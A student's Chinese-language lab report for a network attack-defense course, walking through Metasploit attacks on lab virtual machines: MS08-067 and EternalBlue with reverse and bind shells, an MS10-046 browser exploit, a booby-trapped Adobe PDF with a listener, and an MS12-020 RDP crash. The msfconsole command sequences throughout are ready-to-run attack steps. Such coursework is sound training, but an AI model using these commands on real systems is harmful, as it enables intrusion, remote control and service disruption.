2019-2020-2 20175113完瑞 《网络对抗技术》Exp6 MSF基础应用

Exp6 MSF基础应用

一、实践目标

(一)一个主动攻击实践,如ms08_067

(二)一个针对浏览器的攻击,如ms11_050

(三)一个针对客户端的攻击,如Adobe

(四)成功应用任何一个辅助模块

二、实践内容

  • 主动攻击实践
    • ms08_067:
      • payload/generic/shell_reverse_tcp(成功)
      • payload/windows/meterpreter/reverse_tcp(成功)
    • ms17_010_eternalblue:
      •  payload/generic/shell_reverse_tcp (成功且唯一)
      •  payload/windows/x64/meterpreter/reverse_tcp (成功且唯一)
      •  payload/windows/x64/meterpreter/bind_tcp (成功且唯一)
      •  payload/windows/x64/shell/reverse_tcp_rc4 (成功且唯一)
  • 针对浏览器攻击
    • ms10_046: exploit/windows/browser/ms10_046_shortcut_icon_dllloader (成功且唯一)
  • 针对客户端攻击
    • Adobe: windows/fileformat/adobe_cooltype_sing (成功)
  • 应用一个辅助模块

三、实践步骤

(一)主动攻击实践

  • 实现ms08_067:
  • 靶机版本:Windows xp sp3
  • 我们使用: payload/generic/shell_reverse_tcp 
  • 靶机和攻击机互ping成功

  • 攻击者试探靶机是否存在ms08_067这个漏洞nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.81.148

  • 查看到靶机的版本号,并且查看到靶机存在ms08_067这个漏洞

  • 打开metasploit控制台: msfconsole 
  • 查看ms08_067漏洞: search ms08-067 

  • 选择漏洞use exploit/windows/smb/ms08_067_netapi 

  • 查看设置信息show options

  • 设置靶机ipset RHOSTS 192.168.81.148 

  • 默认端口为445,使用辅助模块查看445端口是否开放

search portscan    //搜索端口
use auxiliary/scanner/portscan/tcp   //使用漏洞
show options    //显示设置
set RHOSTS 10.0.0.140    //设置监听者地址
exploit    //攻击
  • 查看攻击的靶机类型: show targets这里可以不修改

  • 查看可用payload: show payloads ,选择 set payload generic/shell_reverse_tcp 

  • 查看设置信息: show options 

  • 设置监听者ipset LHOST 198.168.81.129 

  • 进行攻击exploit 

  • 尝试更换一个payload:windows/meterpreter/reverse_tcp ,步骤和上述一样,成功:

 

  • 实现MS17_010_eternalblue:
  • payload: generic/shell_reverse_tcp 
nmap --script=vuln 192.168.81.148  //查看靶机开放端口是否存在ms17_010
search ms17_010   //搜索漏洞
use exploit/windows/smb/ms17_010_eternalblue //使用漏洞
show payloads    //显示可用攻击载荷
set payload generic/shell_reverse_tcp  //选择攻击载荷
show options   //查看配置信息
set LHOST 192.168.81.129   //设置监听地址
set RHOSTS 192.168.81.129  //设置靶机地址
exploit    //开始攻击

  • 更换一个payload: windows/x64/meterpreter/reverse_tcp (步骤与上述类似)

  • 再更换一个payload: windows/x64/meterpreter/bind_tcp (步骤与上述类似)

  • 再更换一个payload: windows/x64/shell/reverse_tcp_rc4 (步骤与上述类似)

  • 随便选取使用了4个payload,说明正常情况下只要是相对应的payloads都是可以成功的

 

(二)针对浏览器攻击

  • 实现ms10_046
  • payload: windows/meterpreter/reverse_tcp 
  • 首先查看浏览器漏洞: cd /usr/share/metasploit-framework/modules/exploits/windows/browser 
  • 输入 ls 即可看到很多漏洞代码,选择 ms10_046_shortcut_icon_dllloader.rb 

  • 进入控制台: msfconsole ,使用: use windows/browser/ms10_046_shortcut_icon_dllloader 

  • 查看一下这个漏洞的作用: info 

  • 这个模块利用了Windows快捷方式文件(. lnk)处理中的一个漏洞,该文件包含指向恶意DLL的图标资源。此模块创建一个WebDAV服务,当以UNC路径访问该服务时,可以使用该服> 务运行任意负载。

show payloads      //显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp   //选择攻击载荷
set LHOST 192.168.81.129     //设置监听地址
exploit     //进行攻击

  • 在靶机用浏览器打开生成的链接: http://192.168.81.129:80/ 

  • 查看会话: sessions 
  • 选取会话: session -i 1 

 

(三)针对客户端攻击

  • 对Adobe的攻击(Adobe版本:9.0)
search adobe   //查找Adobe漏洞
use windows/fileformat/adobe_cooltype_sing  //使用漏洞
set payload windows/meterpreter/reverse_tcp   //选择攻击载荷
set LHOST 192.168.81.129  //攻击者地址
set FILENAME 20175113wr.pdf   //设置生成pdf文件的文件名
exploit   //攻击

  • 将生成的文件复制之后导入靶机中:cp /root/.msf4/local/20175113wr.pdf 20175113wr.pdf
  • 退出当前模块,进入监听模块
back   //退出当前模块
use exploit/multi/handler  //进入监听模块
set payload windows/meterpreter/reverse_tcp  //选择攻击载荷
set LHOST 192.168.81.129  //攻击者地址
exploit    //攻击

  • 在靶机中用Adobe打开20175113wr.pdf,上图显示已成功攻击

 

(四)应用辅助模块

  • 实现MS12-020(CVE-2012-0002)蓝屏攻击
  • 靶机:Windows Server 2008 R2
search ms12-020    //搜索漏洞
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //使用漏洞 show options   //查看配置信息
set RHOST 192.168.81.130   //设置靶机IP
exploit    //开始攻击

  • 攻击成功

 

四、实验中遇到的问题及解决方案

(1)在刚开始进行主动攻击的时候,一开始我的靶机我使用的是windows xp家庭版,但是一直没有会话建立,之后更换了好几个系统,才找到可以攻击的系统。

(2)进行MS12-020攻击的时候,出现了缺少RDP服务的提示,参考这篇博客开启了Windows Server 2008 R2的RDP服务,然后攻击成功。

 

五、实验总结

1. 实验总结与体会

        实验初期一直困苦于no sessions的问题,好在成功更换系统解决了,总体上收获很大。虽然前几次实验也使用过msfconsole,但是这次实验让我系统地了解了它的六大模块,实验中用的最多的还是exploit和payload。从这次实验,我也更加感受到nmap的强大,感觉nmap和auxiliary的作用有相似之处。之前在做其他课程的实验也使用过nmap,但是这次却让我实验效率提高。

 

2. 用自己的话解释什么是exploit,payload,encode.

  • exploit:攻击者对靶机进行攻击的这一过程
  • payload:攻击者进行攻击的“武器”
  • encode:编码,使得shellcode改变形状,不具有特定字符

 

3. 离实战还缺些什么技术或步骤?

        就目前我真正掌握的攻击手法,太过单一,应用不灵活,而且扫描靶机的漏洞、可用的端口 技术不够熟练。要真正的应用于实战就要求我们能灵活的使用MSF提供的大部分的攻击手段,同时也得学会使用其他的攻击平台。

posted @ 2020-04-23 20:06  20175113完瑞  阅读(258)  评论(0编辑  收藏